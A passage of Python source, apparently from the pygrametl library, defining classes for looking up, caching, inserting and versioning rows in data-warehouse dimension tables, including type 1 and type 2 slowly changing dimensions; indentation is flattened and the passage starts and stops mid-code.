# VALUES (%(key)s, %(att1)s, %(att2)s, ...)"
self.insertsql = "INSERT INTO " + name + "(%s" % (key,) + \
(attributes and ", " or "") + \
", ".join(attributes) + ") VALUES (" + \
", ".join(["%%(%s)s" % (att,) for att in self.all]) + ")"
if idfinder is not None:
self.idfinder = idfinder
else:
self.targetconnection.execute("SELECT MAX(%s) FROM %s" %
(key, name))
self.__maxid = self.targetconnection.fetchonetuple()[0]
if self.__maxid is None:
self.__maxid = 0
self.idfinder = self._getnextid
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
key = self._before_lookup(row, namemapping)
if key is not None:
return key
self.targetconnection.execute(self.keylookupsql, row, namemapping)
keyvalue = self.targetconnection.fetchonetuple()[0]
if keyvalue is None:
keyvalue = self.defaultidvalue # most likely also None...
self._after_lookup(row, namemapping, keyvalue)
return keyvalue
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
"""
if isinstance(keyvalue, dict):
keyvalue = keyvalue[self.key]
row = self._before_getbykey(keyvalue)
if row is not None:
return row
self.targetconnection.execute(self.rowlookupsql, {self.key: keyvalue})
row = self.targetconnection.fetchone(self.all)
self._after_getbykey(keyvalue, row)
return row
def _before_getbykey(self, keyvalue):
return None
def _after_getbykey(self, keyvalue, resultrow):
pass
def getbyvals(self, values, namemapping={}):
"""Return a list of all rows with values identical to the given.
Arguments:
- values: a dict which must hold a subset of the tables attributes.
All rows that have identical values for all attributes in this
dict are returned.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_getbyvals(values, namemapping)
if res is not None:
return res
# select all attributes from the table. The attributes available from
# the values dict are used in the WHERE clause.
attstouse = [a for a in self.attributes
if a in values or a in namemapping]
sql = "SELECT " + ", ".join(self.all) + " FROM " + self.name + \
" WHERE " + \
" AND ".join(["%s = %%(%s)s" % (att, att) for att in attstouse])
self.targetconnection.execute(sql, values, namemapping)
res = [r for r in self.targetconnection.rowfactory(self.all)]
self._after_getbyvals(values, namemapping, res)
return res
def _before_getbyvals(self, values, namemapping):
return None
def _after_getbyvals(self, values, namemapping, resultrows):
pass
def update(self, row, namemapping={}):
"""Update a single row in the dimension table.
Arguments:
- row: a dict which must contain the key for the dimension.
The row with this key value is updated such that it takes
the value of row[att] for each attribute att which is also in
row.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_update(row, namemapping)
if res:
return
if self.key not in row:
raise KeyError("The key value (%s) is missing in the row" %
(self.key,))
attstouse = [a for a in self.attributes
if a in row or a in namemapping]
if not attstouse:
# Only the key was there - there are no attributes to update
return
sql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % (att, att) for att in attstouse]) + \
" WHERE %s = %%(%s)s" % (self.key, self.key)
self.targetconnection.execute(sql, row, namemapping)
self._after_update(row, namemapping)
def _before_update(self, row, namemapping):
return None
def _after_update(self, row, namemapping):
pass
def ensure(self, row, namemapping={}):
"""Lookup the given row. If that fails, insert it. Return the key value.
If the lookup fails and a rowexpander was set when creating the
instance, this rowexpander is called before the insert takes place.
Arguments:
- row: the row to lookup or insert. Must contain the lookup
attributes.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self.lookup(row, namemapping)
if res is not None and res != self.defaultidvalue:
return res
else:
if self.rowexpander:
row = self.rowexpander(row, namemapping)
return self.insert(row, namemapping)
def insert(self, row, namemapping={}):
"""Insert the given row. Return the new key value.
Arguments:
- row: the row to insert. The dict is not updated. It must contain
all attributes, and is allowed to contain more attributes than
that.
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_insert(row, namemapping)
if res is not None:
return res
key = (namemapping.get(self.key) or self.key)
if row.get(key) is None:
keyval = self.idfinder(row, namemapping)
row = dict(row) # Make a copy to change
row[key] = keyval
else:
keyval = row[key]
self.targetconnection.execute(self.insertsql, row, namemapping)
self._after_insert(row, namemapping, keyval)
return keyval
def _before_insert(self, row, namemapping):
return None
def _after_insert(self, row, namemapping, newkeyvalue):
pass
def _getnextid(self, ignoredrow, ignoredmapping):
self.__maxid += 1
return self.__maxid
def endload(self):
"""Finalize the load."""
pass
class CachedDimension(Dimension):
"""A class for accessing a dimension. Does caching.
We assume that the DB doesn't change or add any attribute
values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts=(),
idfinder=None, defaultidvalue=None, rowexpander=None,
size=10000, prefill=False, cachefullrows=False,
cacheoninsert=True, usefetchfirst=False,
targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members. If not given, it is assumed that
lookupatts = attributes
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- defaultidvalue: An optional value to return when a lookup fails.
This should thus be the ID for a preloaded "Unknown" member.
- rowexpander: A function(row, namemapping) -> row. This function
is called by ensure before insertion if a lookup of the row fails.
This is practical if expensive calculations only have to be done
for rows that are not already present. For example, for a date
dimension where the full date is used for looking up rows, a
rowexpander can be set such that week day, week number, season,
year, etc. are only calculated for dates that are not already
represented. If not given, no automatic expansion of rows is
done.
- size: the maximum number of rows to cache. If less than or equal
to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- cachefullrows: a flag deciding if full rows should be
cached. If not, the cache only holds a mapping from
lookupattributes to key values. Default: False.
- cacheoninsert: a flag deciding if the cache should be updated
when insertions are done. Default: True
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=defaultidvalue,
rowexpander=rowexpander,
targetconnection=targetconnection)
self.cacheoninsert = cacheoninsert
self.__prefill = prefill
self.__size = size
if size > 0:
if cachefullrows:
self.__key2row = FIFODict(size)
self.__vals2key = FIFODict(size)
else:
# Use dictionaries as unlimited caches
if cachefullrows:
self.__key2row = {}
self.__vals2key = {}
self.cachefullrows = cachefullrows
if prefill:
if cachefullrows:
positions = tuple([self.all.index(att)
for att in self.lookupatts])
# select the key and all attributes
sql = "SELECT %s FROM %s" % (", ".join(self.all), name)
else:
# select the key and the lookup attributes
sql = "SELECT %s FROM %s" % \
(", ".join([key] + [l for l in self.lookupatts]), name)
positions = range(1, len(self.lookupatts) + 1)
if size > 0 and usefetchfirst:
sql += " FETCH FIRST %d ROWS ONLY" % size
self.targetconnection.execute(sql)
if size <= 0:
data = self.targetconnection.fetchalltuples()
else:
data = self.targetconnection.fetchmanytuples(size)
for rawrow in data:
if cachefullrows:
self.__key2row[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.__vals2key[t] = rawrow[0]
def lookup(self, row, namemapping={}):
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached. We don't have to look in the DB
res = self._before_lookup(row, namemapping)
if res is not None:
return res
else:
return self.defaultidvalue
else:
# Something is not cached so we have to use the classical lookup.
# (We may still benefit from the cache due to a call of
# _before_lookup)
return Dimension.lookup(self, row, namemapping)
def _before_lookup(self, row, namemapping):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.__vals2key.get(searchtuple, None)
def _after_lookup(self, row, namemapping, resultkey):
if resultkey is not None and (self.defaultidvalue is None or
resultkey != self.defaultidvalue):
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.__vals2key[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.cachefullrows:
res = self.__key2row.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.cachefullrows and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.__key2row[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if ((att in namemapping and
namemapping[att] in row) or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.__vals2key:
del self.__vals2key[searchtuple]
break
if self.cachefullrows:
if row[key] in self.__key2row:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.__key2row[row[key]]
return None
def _after_update(self, row, namemapping):
""" """
if self.__prefill and self.cacheoninsert and \
(self.__size <= 0 or len(self.__vals2key) < self.__size):
# Everything is cached and we sometimes avoid looking in the DB.
# Therefore, we have to update the cache now. In _before_update,
# we deleted the cached data.
keyval = row[(namemapping.get(self.key) or self.key)]
newrow = self.getbykey(keyval) # This also updates __key2row
self._after_lookup(newrow, {}, keyval) # Updates __vals2key
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look the row up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
if self.cacheoninsert:
self._after_lookup(row, namemapping, newkeyvalue)
if self.cachefullrows:
tmp = pygrametl.project(self.all, row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
class TypeOneSlowlyChangingDimension(CachedDimension):
"""A class for accessing a slowly changing dimension of "type 1".
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, type1atts=(),
cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument.
- lookupatts: A subset of the attributes that uniquely identify
a dimension members. These attributes are thus used for looking
up members.
- type1atts: A sequence of attributes that should have type1 updates
applied, it cannot intersect with lookupatts. If not given, it is
assumed that type1atts = attributes - lookupatts
- cachesize: the maximum number of rows to cache. If less than or
equal to 0, unlimited caching is used. Default: 10000
- prefill: a flag deciding if the cache should be filled when
initialized. Default: False
- idfinder: A function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
CachedDimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
size=cachesize,
prefill=prefill,
cachefullrows=False,
cacheoninsert=True,
usefetchfirst=usefetchfirst,
targetconnection=targetconnection)
if type1atts == ():
type1atts = list(set(attributes) - set(lookupatts))
elif not set(type1atts) < set(attributes):
raise ValueError("Type1atts is not a subset of attributes")
elif set(lookupatts) & set(type1atts):
raise ValueError("Intersection between lookupatts and type1atts")
# Ensures "lookupatts != attributes" as it prevents type 1 updates
if not len(type1atts):
raise ValueError("Type1atts contain no attributes")
self.type1atts = type1atts
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the table. It must
contain all attributes if it is the first version of the row to be
inserted, updates of existing rows need only contain lookupatts
and a subset of type1atts as a missing type1atts is ignored and
the existing value left as is in the database.
- namemapping: an optional namemapping (see module's documentation)
"""
# NOTE: the "vals2key" cache is kept coherent by "scdensure", as it only
# contains "lookupatts" which "scdensure" is prohibited from changing
keyval = self.lookup(row, namemapping)
key = (namemapping.get(self.key) or self.key)
if keyval is None:
# The first version of the row is inserted
keyval = self.insert(row, namemapping)
row[key] = keyval
else:
# The row did exist so we update the type1atts provided
row[key] = keyval
# Takes the user provided namemapping into account and checks what
# subset of type1atts should be updated based on the content of row
type1atts = []
for att in self.type1atts:
if (namemapping.get(att) or att) in row:
type1atts.append(att)
if not type1atts:
return
# The SQL is constructed to update only the changed values without
# the need for looking up the old row to extract the existing
# values
updatesql = "UPDATE " + self.name + " SET " + \
", ".join(["%s = %%(%s)s" % \
(att, att) for att in type1atts]) + \
" WHERE %s = %%(%s)s" % (key, key)
# Update is not used, to skip the checks for updates to the caches
self.targetconnection.execute(updatesql, row, namemapping)
return row[key]
class SlowlyChangingDimension(Dimension):
"""A class for accessing a slowly changing dimension of "type 2".
"Type 1" updates can also be applied for a subset of the attributes.
Caching is used. We assume that the DB doesn't change or add any
attribute values that are cached.
For example, a DEFAULT value in the DB or automatic type coercion can
break this assumption.
"""
def __init__(self, name, key, attributes, lookupatts, versionatt,
fromatt=None, fromfinder=None,
toatt=None, tofinder=None, minfrom=None, maxto=None,
srcdateatt=None, srcdateparser=pygrametl.ymdparser,
type1atts=(), cachesize=10000, prefill=False, idfinder=None,
usefetchfirst=False, targetconnection=None):
"""Arguments:
- name: the name of the dimension table in the DW
- key: the name of the primary key in the DW
- attributes: a sequence of the attribute names in the dimension
table. Should not include the name of the primary key which is
given in the key argument, but should include versionatt,
fromatt, and toatt.
- lookupatts: a sequence with a subset of the attributes that
uniquely identify a dimension members. These attributes are thus
used for looking up members.
- versionatt: the name of the attribute holding the version number
- fromatt: the name of the attribute telling from when the version
becomes valid. Not used if None. Default: None
- fromfinder: a function(targetconnection, row, namemapping)
returning a value for the fromatt for a new version (the function
is first used when it is determined that a new version must be
added; it is not applied to determine this).
If fromfinder is None and srcdateatt is also None,
pygrametl.today is used as fromfinder. If fromfinder is None
and srcdateatt is not None,
pygrametl.datereader(srcdateatt, srcdateparser) is used.
In other words, if no date attribute and no special
date function are given, new versions get the date of the current
day. If a date attribute is given (but no date function), the
date attribute's value is converted (by means of srcdateparser)
and a new version gets the result of this as the date it is valid
from. Default: None
- toatt: the name of the attribute telling until when the version
is valid. Not used if None. Default: None
- tofinder: a function(targetconnection, row, namemapping)
returning a value for the toatt. If not set, fromfinder is used
(note that if fromfinder is None, it is set to a default
function -- see the comments about fromfinder. The possibly
modified value is used here.) Default: None
- minfrom: the value to use for fromatt for the 1st version of a
member if fromatt is not already set. If None, the value is
found in the same way as for other new versions, i.e., as
described for fromfinder. If fromatt should take the value
NULL for the 1st version, set minfrom to a tuple holding a single
element which is None: (None,). Note that minto affects the 1st
version, not any following versions. Note also that if the member
to insert already contains a value for fromatt, minfrom is ignored.
Default: None.
- maxto: the value to use for toatt for new members. Default: None
- srcdateatt: the name of the attribute in the source data that
holds a date showing when a version is valid from. The data is
converted to a datetime by applying srcdateparser on it.
If not None, the date attribute is also used when comparing
a potential new version to the newest version in the DB.
If None, the date fields are not compared. Default: None
- srcdateparser: a function that takes one argument (a date in the
format scrdateatt has) and returns a datetime.datetime.
If srcdateatt is None, srcdateparser is not used.
Default: pygrametl.ymdparser (i.e., the default value is a
function that parses a string of the form 'yyyy-MM-dd')
- type1atts: a sequence of attributes that should have type1 updates
applied. Default: ()
- cachesize: the maximum size of the cache. 0 disables caching
and values smaller than 0 allows unlimited caching
- prefill: decides if the cache should be prefilled with the newest
versions. Default: False. NB: This is a new argument in ver. 0.2.0.
- idfinder: a function(row, namemapping) -> key value that assigns
a value to the primary key attribute based on the content of the
row and namemapping. If not given, it is assumed that the primary
key is an integer, and the assigned key value is then the current
maximum plus one.
- usefetchfirst: a flag deciding if the SQL:2008 FETCH FIRST
clause is used when prefil is True. Depending on the used DBMS
and DB driver, this can give significant savings wrt. to time and
memory. Not all DBMSs support this clause yet. Default: False
- targetconnection: The ConnectionWrapper to use. If not given,
the default target connection is used.
"""
# TODO: Should scdensure just override ensure instead of being a new
# method?
Dimension.__init__(self,
name=name,
key=key,
attributes=attributes,
lookupatts=lookupatts,
idfinder=idfinder,
defaultidvalue=None,
rowexpander=None,
targetconnection=targetconnection)
if not versionatt:
raise ValueError('A version attribute must be given')
self.versionatt = versionatt
self.fromatt = fromatt
if fromfinder is not None:
self.fromfinder = fromfinder
elif srcdateatt is not None: # and fromfinder is None
self.fromfinder = pygrametl.datereader(srcdateatt, srcdateparser)
else: # fromfinder is None and srcdateatt is None
self.fromfinder = pygrametl.today
self.toatt = toatt
if tofinder is None:
tofinder = self.fromfinder
self.tofinder = tofinder
self.minfrom = minfrom
self.maxto = maxto
self.srcdateatt = srcdateatt
self.srcdateparser = srcdateparser
self.type1atts = type1atts
if cachesize > 0:
self.rowcache = FIFODict(cachesize)
self.keycache = FIFODict(cachesize)
elif cachesize < 0:
self.rowcache = {}
self.keycache = {}
# else cachesize == 0 and we do not create any caches
self.__cachesize = cachesize
self.__prefill = prefill
# Check that versionatt, fromatt and toatt are also declared as
# attributes
for var in (versionatt, fromatt, toatt):
if var and var not in attributes:
raise ValueError("%s not present in attributes argument" %
(var,))
# Now extend the SQL from Dimension such that we use the versioning
self.keylookupsql += " ORDER BY %s DESC" % (versionatt,)
if toatt:
self.updatetodatesql = \
"UPDATE %s SET %s = %%(%s)s WHERE %s = %%(%s)s" % \
(name, toatt, toatt, key, key)
if prefill:
self.__prefillcaches(usefetchfirst)
def __prefillcaches(self, usefetchfirst):
args = None
if self.toatt:
# We can use the toatt to see if rows are still current.
# Select all attributes from the rows where maxto is set to the
# default value (which may be NULL)
sql = 'SELECT %s FROM %s WHERE %s %s' % \
(', '.join(self.all), self.name, self.toatt,
self.maxto is None and 'IS NULL' or '= %(maxto)s')
if self.maxto is not None:
args = {'maxto': self.maxto}
else:
# We have to find max(versionatt) for each group of lookupatts and
# do a join to get the right rows.
lookupattlist = ', '.join(self.lookupatts)
newestversions = ('SELECT %s, MAX(%s) AS %s FROM %s GROUP BY %s' %
(lookupattlist, self.versionatt, self.versionatt, self.name,
lookupattlist))
joincond = ' AND '.join(['A.%s = B.%s' % (att, att) for att in
[l for l in self.lookupatts] +
[self.versionatt]
])
sql = 'SELECT %s FROM (%s) AS A, %s AS B WHERE %s' %\
(', '.join(['B.%s AS %s' % (att, att) for att in self.all]),
newestversions, self.name, joincond)
# sql is a statement that fetches the newest versions from the database
# in order to fill the caches, the FETCH FIRST clause is for a finite
# cache, if the user set the flag that it is supported by the database.
positions = [self.all.index(att) for att in self.lookupatts]
if self.__cachesize > 0 and usefetchfirst:
sql += ' FETCH FIRST %d ROWS ONLY' % self.__cachesize
self.targetconnection.execute(sql, args)
for rawrow in self.targetconnection.fetchmanytuples(self.__cachesize):
self.rowcache[rawrow[0]] = rawrow
t = tuple([rawrow[i] for i in positions])
self.keycache[t] = rawrow[0]
def lookup(self, row, namemapping={}):
"""Find the key for the newest version with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
- namemapping: an optional namemapping (see module's documentation)
"""
if self.__prefill and (self.__cachesize < 0 or
len(self.keycache) < self.__cachesize):
# Everything is cached. We don't have to look in the DB
return self._before_lookup(row, namemapping)
else:
# Something is not cached so we have to use the classical lookup.
# Note that __init__ updated self.keylookupsql to use ORDER BY ...
return Dimension.lookup(self, row, namemapping)
def scdensure(self, row, namemapping={}):
"""Lookup or insert a version of a slowly changing dimension member.
.. Note:: Has side-effects on the given row.
Arguments:
- row: a dict containing the attributes for the member.
key, versionatt, fromatt, and toatt are not required to be
present but will be added (if defined).
- namemapping: an optional namemapping (see module's documentation)
"""
versionatt = (namemapping.get(self.versionatt) or self.versionatt)
key = (namemapping.get(self.key) or self.key)
if self.fromatt: # this protects us against None in namemapping.
fromatt = (namemapping.get(self.fromatt) or self.fromatt)
else:
fromatt = None
if self.toatt:
toatt = (namemapping.get(self.toatt) or self.toatt)
else:
toatt = None
if self.srcdateatt:
srcdateatt = (namemapping.get(self.srcdateatt) or self.srcdateatt)
else:
srcdateatt = None
# Get the newest version and compare to that
keyval = self.lookup(row, namemapping)
if keyval is None:
# It is a new member. We add the first version.
row[versionatt] = 1
if fromatt and fromatt not in row:
if self.minfrom is not None:
# We need the following hack to distinguish between
# 'not set' and 'use the value None'...
if self.minfrom == (None,):
row[fromatt] = None
else:
row[fromatt] = self.minfrom
else:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt and toatt not in row:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
return row[key]
else:
# There is an existing version. Check if the attributes are
# identical
type1updates = {} # for type 1
addnewversion = False # for type 2
other = self.getbykey(keyval) # the full existing version
for att in self.all:
# Special (non-)handling of versioning and key attributes:
if att in (self.key, self.versionatt, self.toatt):
# Don't compare these - we don't expect them to have
# meaningful values in row
continue
# We may have to compare the "from dates"
elif att == self.fromatt:
if self.srcdateatt is None: # We don't compare dates then
continue
else:
# We have to compare the dates in row[..] and other[..].
# We have to make sure that the dates are of comparable
# types.
rdt = self.srcdateparser(row[srcdateatt])
if rdt == other[self.fromatt]:
continue # no change in the "from attribute"
elif isinstance(rdt, type(other[self.fromatt])):
# they are not equal but are of the same type, so we
# are dealing with a new date
addnewversion = True
else:
# They have different types (and are thus not
# equal). Try to convert to strings and see if they
# are equal.
modref = self.targetconnection.getunderlyingmodule()
rowdate = modref.Date(rdt.year, rdt.month, rdt.day)
if str(rowdate).strip('\'"') != \
str(other[self.fromatt]).strip('\'"'):
addnewversion = True
# Handling of "normal" attributes:
else:
mapped = (namemapping.get(att) or att)
if row[mapped] != other[att]:
if att in self.type1atts:
type1updates[att] = row[mapped]
else:
addnewversion = True
if addnewversion and not self.type1atts:
# We don't have to look for possible type 1 updates
# and we already know that a type 2 update is needed.
break
# else: continue
if len(type1updates) > 0:
# Some type 1 updates were found
self.__performtype1updates(type1updates, other)
if addnewversion: # type 2
# Make a new row version and insert it
row.pop(key, None)
row[versionatt] = other[self.versionatt] + 1
if fromatt:
row[fromatt] = self.fromfinder(self.targetconnection,
row, namemapping)
if toatt:
row[toatt] = self.maxto
row[key] = self.insert(row, namemapping)
# Update the todate attribute in the old row version in the DB.
if toatt:
toattval = self.tofinder(self.targetconnection, row,
namemapping)
self.targetconnection.execute(
self.updatetodatesql, {
self.key: keyval, self.toatt: toattval})
# Only cache the newest version - this is new in ver. 0.2.0!
if keyval in self.rowcache:
del self.rowcache[keyval]
else:
# Update the row dict by giving version and dates and the key
row[key] = keyval
row[versionatt] = other[self.versionatt]
if self.fromatt:
row[fromatt] = other[self.fromatt]
if self.toatt:
row[toatt] = other[self.toatt]
return row[key]
def _before_lookup(self, row, namemapping):
if self.__cachesize:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
return self.keycache.get(searchtuple, None)
return None
def _after_lookup(self, row, namemapping, resultkey):
if self.__cachesize and resultkey is not None:
namesinrow = [(namemapping.get(a) or a) for a in self.lookupatts]
searchtuple = tuple([row[n] for n in namesinrow])
self.keycache[searchtuple] = resultkey
def _before_getbykey(self, keyvalue):
if self.__cachesize:
res = self.rowcache.get(keyvalue)
if res is not None:
return dict(zip(self.all, res))
return None
def _after_getbykey(self, keyvalue, resultrow):
if self.__cachesize and resultrow[self.key] is not None:
# if resultrow[self.key] is None, no result was found in the db
self.rowcache[keyvalue] = tuple([resultrow[a] for a in self.all])
def _before_update(self, row, namemapping):
""" """
# We have to remove old values from the caches.
key = (namemapping.get(self.key) or self.key)
for att in self.lookupatts:
if (att in namemapping or att in row):
# A lookup attribute is about to be changed and we should make
# sure that the cache does not map from the old value. Here,
# we can only see the new value, but we can get the old lookup
# values by means of the key:
oldrow = self.getbykey(row[key])
namesinrow = [(namemapping.get(a) or a)
for a in self.lookupatts]
searchtuple = tuple([oldrow[n] for n in namesinrow])
if searchtuple in self.keycache:
del self.keycache[searchtuple]
break
if row[key] in self.rowcache:
# The cached row is now incorrect. We must make sure it is
# not in the cache.
del self.rowcache[row[key]]
return None
def _after_insert(self, row, namemapping, newkeyvalue):
""" """
# After the insert, we can look it up. Pretend that we
# did that. Then we get the new data cached.
# NB: Here we assume that the DB doesn't change or add anything.
# For example, a DEFAULT value in the DB or automatic type coercion can
# break this assumption.
# Note that we always cache inserted members (in CachedDimension
# this is an option).
if self.__cachesize:
self._after_lookup(row, namemapping, newkeyvalue)
tmp = pygrametl.project(self.all[1:], row, namemapping)
tmp[self.key] = newkeyvalue
self._after_getbykey(newkeyvalue, tmp)
def __performtype1updates(self, updates, lookupvalues, namemapping={}):
""" """
# find the keys in the rows that should be updated
self.targetconnection.execute(self.keylookupsql, lookupvalues,
namemapping)
updatekeys = [e[0] for e in self.targetconnection.fetchalltuples()]
updatekeys.reverse()
# Generate SQL for the update
valparts = ", ".join(["%s = %%(%s)s" % (k, k) for k in updates])
keyparts = ", ".join([str(k) for k in updatekeys])
sql = "UPDATE %s SET %s WHERE %s IN (%s)" % \
(self.name, valparts, self.key, keyparts)
self.targetconnection.execute(sql, updates)
# Remove from our own cache
for key in updatekeys:
if key in self.rowcache:
del self.rowcache[key]
SCDimension = SlowlyChangingDimension
# NB: SnowflakedDimension's methods may have side-effects:
# row[somedim.key] = someval.
class SnowflakedDimension(object):
"""A class for accessing a snowflaked dimension spanning several tables
in the underlying database. Lookups and inserts are then automatically
spread out over the relevant tables while the programmer only needs
to interact with a single SnowflakedDimension instance.
"""
def __init__(self, references, expectboguskeyvalues=False):
"""Arguments:
- references: a sequence of pairs of Dimension objects
[(a1,a2), (b1,b2), ...] meaning that a1 has a foreign key to a2
etc. a2 may itself be a sequence of Dimensions:
[(a1, [a21, a22, ...]), (b1, [b21, b22, ...]), ...].
The first element of the first pair (a1 in the example above) must
be the dimension table representing the lowest level in the
hierarchy (i.e., the dimension table the closest to the fact
table).
Each dimension must be reachable in a unique way (i.e., the
given dimensions form a tree).
A foreign key must have the same name as the primary key it
references.
- expectboguskeyvalues: If expectboguskeyvalues is True, we allow a
key that is used as lookup attribute in a lower level to hold a
wrong value (which would typically be None). When ensure or
insert is called, we find the correct value for the key in the
higher level. If expectboguskeyvalues, we again try a lookup on
the lower level after this. If expectboguskeyvalues is False, we
move directly on to do an insert. Default: False
"""
self.root = references[0][0]
self.targetconnection = self.root.targetconnection
self.key = self.root.key
self.lookupatts = self.root.lookupatts
dims = set([self.root])
self.refs = {}
self.refkeys = {}
self.all = self.root.all[:]
for (dim, refeddims) in references:
# Check that all dimensions use the same target connection.
# Build the dict self.refs:
# {dimension -> set(refed dimensions)}
# Build self.all from dimensions' lists
# Keep track of seen dimensions by means of the set dims and
# ensure that each table is only reachable once.
if isinstance(refeddims, Dimension):
# If there is only one dimension, then make a tuple with that
refeddims = (refeddims, )
for rd in refeddims:
if rd.targetconnection is not self.targetconnection:
raise ValueError("Different connections used")
if rd in dims:
raise ValueError("The tables do not form a tree")
dims.add(rd)
tmp = self.refs.get(dim, set())
tmp.add(rd)
self.refs[dim] = tmp
# The key is alredy there as we assume FKs and PKs have
# identical names
self.all.extend(list(rd.attributes))
# Check that all dimensions in dims are reachable from the root
dimscopy = dims.copy()
dimscopy.remove(self.root)
for (tbl, targets) in self.refs.items():
for target in targets:
# It is safe to use remove as each dim is only referenced once
dimscopy.remove(target)
# Those dimensions that are left in dims at this point are unreachable
if len(dimscopy) != 0:
raise ValueError("Not every given dimension is reachable")
# Construct SQL...
self.keylookupsql = self.root.keylookupsql
self.allnames = []
for dim in dims:
for att in dim.attributes:
self.allnames.append(att)
# Make sure that there are no duplicated names:
if len(self.allnames) != len(set(self.allnames)):
raise ValueError("Duplicated attribute names found")
self.alljoinssql = "SELECT " + ", ".join(self.allnames) + \
" FROM " + " NATURAL JOIN ".join(map(lambda d: d.name, dims))
self.rowlookupsql = self.alljoinssql + " WHERE %s.%s = %%(%s)s" % \
(self.root.name, self.root.key, self.root.key)
self.levels = {}
self.__buildlevels(self.root, 0)
self.levellist = list(range(len(self.levels)))
self.levellist.reverse()
self.expectboguskeyvalues = expectboguskeyvalues
def __buildlevels(self, node, level):
tmp = self.levels.get(level, [])
tmp.append(node)
self.levels[level] = tmp
for ref in self.refs.get(node, []):
self.__buildlevels(ref, level + 1)
def lookup(self, row, namemapping={}):
"""Find the key for the row with the given values.
Arguments:
- row: a dict which must contain at least the lookup attributes
which all must come from the root (the table closest to the
fact table).
- namemapping: an optional namemapping (see module's documentation)
"""
res = self._before_lookup(row, namemapping)
if res:
return res
res = self.root.lookup(row, namemapping)
self._after_lookup(row, namemapping, res)
return res
def _before_lookup(self, row, namemapping):
return None
def _after_lookup(self, row, namemapping, resultkeyvalue):
pass
def getbykey(self, keyvalue, fullrow=False):
"""Lookup and return the row with the given key value.
If no row is found in the dimension table, the function returns
a row where all values (including the key) are None.
Arguments:
- keyvalue: the key value of the row to lookup
- fullrow: a flag deciding if the full row (with data from
all tables in the snowflake) should be returned. If False,
only data from the lowest level in the hierarchy (i.e., the table
the closest to the fact table) is returned. Default: False
"""
res = self._before_getbykey(keyvalue, fullrow)
if res:
return res
if not fullrow:
res = self.root.getbykey(keyvalue)
else:
